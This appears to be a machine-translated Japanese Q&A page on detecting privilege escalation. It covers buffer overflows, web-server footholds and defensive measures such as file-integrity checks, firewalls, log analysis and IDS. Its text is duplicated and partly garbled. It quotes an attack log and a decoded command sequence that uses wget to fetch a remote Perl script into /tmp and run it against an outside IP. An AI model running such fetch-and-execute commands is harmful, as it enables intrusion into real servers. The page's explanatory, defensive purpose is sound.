特権上昇検出？

Question

脆弱性の悪用の鍵は、発見されないように努力することです。その結果、ほとんどのエクスプロイトは少なくとも最初は通常の手段を介してシステムに侵入しません。彼らは通常、次のようなものを使用します。バッファオーバーフローシステムにアクセスするには

バッファオーバーフロー

このタイプの攻撃は、ユーザー入力を取得すると予想されるアプリケーションの一部を探します。情報を提供する必要があるWebページとさまざまなテキストボックスを検討してください。すべてのテキストボックスは潜在的な攻撃者の潜在的なエントリポイントになります。

良いニュース：

これらの攻撃のほとんどはルートアクセス権を取得せず、Webサーバー用に特別に設定されたユーザーアカウントへのアクセス権を取得します。したがって、通常はWebサーバーのファイルと機能にのみアクセスできます。
攻撃者は侵入中にいくつかの地域にかなりの痕跡を残しました。
- ファイアウォールログ
- Webサーバーログ
- その他の潜在的なセキュリティツールログ

悪いニュース：

彼らはシステムへのアクセス権を得て、それゆえ追加の侵入を試みることができる橋頭堤を持っています。
丸太。はい、ログ分析には時間がかかり、エラーが発生しやすいことを考慮すると、ほとんどの場合、数週間/月/年に侵入は検出されません。

ルートログイン検出

ほとんどのシステムはルートログインを許可しないように設計されているため、この攻撃ベクトルは実際には問題になりません。ほとんどの攻撃は他の下位レベルのアカウントにアクセスし、システムに橋頭堤が設定されていると、他の脆弱性を見つけて悪用します。

例#1:

攻撃者は次のタスクを実行してrootアクセス権を取得する可能性があります。

テキストボックスを介してフォーム上のユーザー入力を処理する脆弱なWebページを見つけ、システムのWebサーバーアカウントを破損します。
Web サーバーアカウントへのアクセス権を取得したら、Web サーバーアカウントからシェルアクセス権を取得するか、Web サーバーアカウントにユーザーの代わりにコマンドを実行させるようにしてください。
特定のシステムのツール（コマンドなど）のバージョンに脆弱性があることを確認してくださいls。
lsルートアカウントにアクセスするには、ツールをオーバーフローしてください。

例＃2：

潜在的な攻撃者はシステムを完全に制御することに興味がないかもしれません。ほとんどの侵入者は、他の用途に「奴隷」を収集するシステムにのみ興味があります。多くの場合、攻撃者はシステムを完全に制御することなくソフトウェアを使用できるように、システムにソフトウェアをインストールしたいと考えています。

ウェブサイトがwebapp Xを開いていることを確認してください。攻撃者は、webapp Xにユーザーが画像ファイルをアップロードする可能性がある脆弱性があることを知っています。
攻撃者はという名前のファイルを準備してCMD.gifアップロードします。たとえば、フォーラムサイトのユーザーのアバター画像です。ところがCMD.gifイメージではなく、実際にはというプログラムですCMD.gif。
攻撃者はフォーラムサイトに「画像」をアップロードしました。
これで、攻撃者はwebapp Xを「だまして」自分の「イメージ」を実行させます。
攻撃者はブラウザを使用してwebapp Xを呼び出しますが、webapp Xの作成者が想像もしなかった方法で呼び出します。彼らはまた、これを無効にするようにwebapp Xを設計していません。

これらの攻撃に対するWebサーバーログファイル

201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
  "GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
  &cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
  %2072.36.21.183%2021 HTTP/1.1" 200

メモ:Apache Webサーバーのサンプルログ（提供）OSSEC.net。

ここで攻撃者は webapp X(index.php) を実行しており、CMD.gif次のことができます。

cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21

/tmpだから彼らはwebappをだましましたdc.txt。

「破損した」サーバーを無効にする

脆弱性が「検出された」サーバーをシャットダウンできるという考えは良い試みですが、いくつかの理由で機能しません。

攻撃者が最初のシステムに侵入できる場合は、おそらく2番目のシステムに侵入する可能性があります。
ほとんどのシステムは本質的にお互いのレプリカです。メンテナンスがより簡単で簡単に（同じ）維持することは、ITおよびコンピューティングの分野のほとんどの特徴です。
構成が異なると、システムを保守するためにさらに作業が必要になり、エラーが発生する可能性が高くなり、これはしばしば脆弱性につながります。
攻撃者の目標は侵入ではなく、サービスへのアクセスを拒否しようとする可能性があります。これは…サービス拒否（DoS）。

ダメージを制限しようとする

続行することもできますが、通常はシステムセキュリティに関連して使用できるリソースがいくつかあります。

次のようなものを使用してください引き継ぎ鉄線システムファイルシステムの変更を検出します。
ファイアウォール - すべてへのフルアクセスではなく、必要な場合にのみアクセスが明示的に許可されるようにアクセスを制限します。
ツールを使用してログファイルを分析し、異常の兆候を検出します。
システムを最新の状態に保ち、最新のパッチをインストールします。
露出を制限してください。システムに必要なソフトウェアのみをインストールしてください。コンパイラをインストールする必要がない場合はgccインストールしないでください。
IDS - 侵入検知ソフトウェア。

Answer 1

脆弱性の悪用の鍵は、発見されないように努力することです。その結果、ほとんどのエクスプロイトは少なくとも最初は通常の手段を介してシステムに侵入しません。彼らは通常、次のようなものを使用します。バッファオーバーフローシステムにアクセスするには

バッファオーバーフロー

このタイプの攻撃は、ユーザー入力を取得すると予想されるアプリケーションの一部を探します。情報を提供する必要があるWebページとさまざまなテキストボックスを検討してください。すべてのテキストボックスは潜在的な攻撃者の潜在的なエントリポイントになります。

良いニュース：

これらの攻撃のほとんどはルートアクセス権を取得せず、Webサーバー用に特別に設定されたユーザーアカウントへのアクセス権を取得します。したがって、通常はWebサーバーのファイルと機能にのみアクセスできます。
攻撃者は侵入中にいくつかの地域にかなりの痕跡を残しました。
- ファイアウォールログ
- Webサーバーログ
- その他の潜在的なセキュリティツールログ

悪いニュース：

彼らはシステムへのアクセス権を得て、それゆえ追加の侵入を試みることができる橋頭堤を持っています。
丸太。はい、ログ分析には時間がかかり、エラーが発生しやすいことを考慮すると、ほとんどの場合、数週間/月/年に侵入は検出されません。

ルートログイン検出

ほとんどのシステムはルートログインを許可しないように設計されているため、この攻撃ベクトルは実際には問題になりません。ほとんどの攻撃は他の下位レベルのアカウントにアクセスし、システムに橋頭堤が設定されていると、他の脆弱性を見つけて悪用します。

例#1:

攻撃者は次のタスクを実行してrootアクセス権を取得する可能性があります。

テキストボックスを介してフォーム上のユーザー入力を処理する脆弱なWebページを見つけ、システムのWebサーバーアカウントを破損します。
Web サーバーアカウントへのアクセス権を取得したら、Web サーバーアカウントからシェルアクセス権を取得するか、Web サーバーアカウントにユーザーの代わりにコマンドを実行させるようにしてください。
特定のシステムのツール（コマンドなど）のバージョンに脆弱性があることを確認してくださいls。
lsルートアカウントにアクセスするには、ツールをオーバーフローしてください。

例＃2：

潜在的な攻撃者はシステムを完全に制御することに興味がないかもしれません。ほとんどの侵入者は、他の用途に「奴隷」を収集するシステムにのみ興味があります。多くの場合、攻撃者はシステムを完全に制御することなくソフトウェアを使用できるように、システムにソフトウェアをインストールしたいと考えています。

ウェブサイトがwebapp Xを開いていることを確認してください。攻撃者は、webapp Xにユーザーが画像ファイルをアップロードする可能性がある脆弱性があることを知っています。
攻撃者はという名前のファイルを準備してCMD.gifアップロードします。たとえば、フォーラムサイトのユーザーのアバター画像です。ところがCMD.gifイメージではなく、実際にはというプログラムですCMD.gif。
攻撃者はフォーラムサイトに「画像」をアップロードしました。
これで、攻撃者はwebapp Xを「だまして」自分の「イメージ」を実行させます。
攻撃者はブラウザを使用してwebapp Xを呼び出しますが、webapp Xの作成者が想像もしなかった方法で呼び出します。彼らはまた、これを無効にするようにwebapp Xを設計していません。

これらの攻撃に対するWebサーバーログファイル

201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
  "GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
  &cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
  %2072.36.21.183%2021 HTTP/1.1" 200

メモ:Apache Webサーバーのサンプルログ（提供）OSSEC.net。

ここで攻撃者は webapp X(index.php) を実行しており、CMD.gif次のことができます。

cd /tmp
wget http://72.36.254.26/~fanta/dc.txt
perl dc.txt 72.36.21.183 21

/tmpだから彼らはwebappをだましましたdc.txt。

「破損した」サーバーを無効にする

脆弱性が「検出された」サーバーをシャットダウンできるという考えは良い試みですが、いくつかの理由で機能しません。

攻撃者が最初のシステムに侵入できる場合は、おそらく2番目のシステムに侵入する可能性があります。
ほとんどのシステムは本質的にお互いのレプリカです。メンテナンスがより簡単で簡単に（同じ）維持することは、ITおよびコンピューティングの分野のほとんどの特徴です。
構成が異なると、システムを保守するためにさらに作業が必要になり、エラーが発生する可能性が高くなり、これはしばしば脆弱性につながります。
攻撃者の目標は侵入ではなく、サービスへのアクセスを拒否しようとする可能性があります。これは…サービス拒否（DoS）。

ダメージを制限しようとする

続行することもできますが、通常はシステムセキュリティに関連して使用できるリソースがいくつかあります。

次のようなものを使用してください引き継ぎ鉄線システムファイルシステムの変更を検出します。
ファイアウォール - すべてへのフルアクセスではなく、必要な場合にのみアクセスが明示的に許可されるようにアクセスを制限します。
ツールを使用してログファイルを分析し、異常の兆候を検出します。
システムを最新の状態に保ち、最新のパッチをインストールします。
露出を制限してください。システムに必要なソフトウェアのみをインストールしてください。コンパイラをインストールする必要がない場合はgccインストールしないでください。
IDS - 侵入検知ソフトウェア。

特権上昇検出？

ベストアンサー1

バッファオーバーフロー

良いニュース：

悪いニュース：

ルートログイン検出

例#1:

例＃2：

「破損した」サーバーを無効にする

ダメージを制限しようとする

おすすめ記事